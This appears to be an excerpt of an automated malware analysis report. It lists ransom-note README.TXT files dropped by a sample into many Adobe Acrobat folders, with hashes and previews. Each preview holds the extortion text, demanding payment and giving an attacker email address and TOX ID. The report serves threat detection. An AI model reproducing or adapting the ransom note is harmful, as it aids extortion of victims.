                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\da-dk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\de-de\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-gb\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-fr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
